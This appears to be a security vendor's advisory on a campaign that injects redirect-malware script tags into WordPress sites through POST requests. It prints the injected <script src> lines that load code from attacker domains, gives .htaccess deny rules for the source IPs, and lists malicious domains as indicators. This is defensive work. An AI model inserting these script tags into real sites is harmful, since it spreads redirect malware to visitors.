Recently we notice many POST requests designed to inject WordPress websites with the following script. If you recently noticed Wordfence alerts, it doesn’t mean the website is infected – the attacks were likely unsuccessful.
However, if the code was successfully injected, a professional cleanup is recommended, followed by a website review and update.
Try our Free site check.
<script src="https://synd.edgecdnc.com"></script>
<script src="https://secure.globalultracdn.com"></script>
Contamination signs
Redirect malware in WordPress can be quite stealthy, often randomly redirecting visitors to malicious websites without the website owner’s knowledge.
- Unexpected redirects: Users are redirected to unrelated or malicious websites when they try to access your WordPress site or specific pages.
- Traffic spikes or drops: Sudden spikes or drops in website traffic can indicate that your site is being redirected, either driving fake traffic or deterring real visitors.
- Unknown scripts or files: Check your website’s files and scripts for any unfamiliar or suspicious code, especially in theme files, plugin directories, or the .htaccess file.
- Complaints from visitors: If visitors report being redirected or experiencing other suspicious behavior on your site, take their feedback seriously and investigate promptly.
If you suspect that your WordPress site has been infected with redirect malware, it’s essential to take immediate action to clean your site and prevent further damage.
This may involve using security plugins, scanning your site for malware, updating WordPress core, themes, and plugins to their latest versions, and strengthening your site’s security measures. Additionally, consider reaching out to a security expert for assistance in resolving the issue.
Malicious POST requests sent from:
31.43.191.220 AS210848, Telkom Internet LTD Azerbaijan
94.102.51.144, 80.82.76.214, AS202425 IP Volume Netherlands
How to block malicious POST requests:
If .htaccess is available, you can block the malicious traffic blocking the whole IP range.
deny from 31.43.191.0/24 deny from 94.102.51.0/24 deny from 80.82.76.0/24
Malicious URL
https://synd.edgecdnc.com
https://secure.globalultracdn.com > resolves to 101.99.75.138
https://cloud.tnewstraffic.com/?news&s
Cloudflare nameservers
1. tnewstraffic.com
zara.ns.cloudflare.com, cash.ns.cloudflare.com
Hosting: Amarutu Technology Ltd, [email protected], ASN AS206264
2. gdcstatic.com
wren.ns.cloudflare.com, hunts.ns.cloudflare.com
Hosting: Amarutu Technology Ltd, [email protected], ASN AS206264
3. edgecdnc.com
leia.ns.cloudflare.com, cameron.ns.cloudflare.com
Hosting: Amarutu Technology Ltd, [email protected], ASN AS206264
Other suspicious links:
https://mc.yandex.ru/metrika/tag.js
https://mc.yandex.ru/watch/95897511
https://stripeformism.com/iMycVFaPaOgk/73384
https://gemfowls.com/emr2zm1sk
https://ww1.tech4u.app/mpc/
https://swapsprediet.top/cuid/?f=https%3A%2F%2Fstripeformism.com
https://fordamairing.top/ibpTGtqKlaHWPlORDsbSR/73384/
https://ak.kocairdo.net/4/7427104
https://www.yametric.com
Malicious Cloudflare nameservers: cameron.ns.cloudflare.com, leia.ns.cloudflare.com.
Malicious domains: content.streamfastcdn.com, content.gorapidcdn.com, cdn.metricastats.com, gll.metricaga.com, go.syndcloud.com, cloud.edgerapidcdn.com, ga.cdzanalytics.com, syndication.gcdnanalytics.com, gll.metricaga.com, synd.edgecdnc.com, host.gsslcloud.com, fast.quickcontentnetwork.com, static.rapidglobalorbit.com, secure.globalultracdn.com, metrics.gocloudmaps.com, cache.cloudswiftcdn.com, host.cloudsonicwave.com, secure.gdcstatic.com
If you’ve recently noticed bogus popups or unexpected redirects to suspicious domains on your website, we can help.
Our skilled malware analysts are available 24/7 to fix hacked websites and clean up malware – reach out to us if you need help.
Try our Free site check.
A security analyst will perform a free thorough external site check within the next minutes.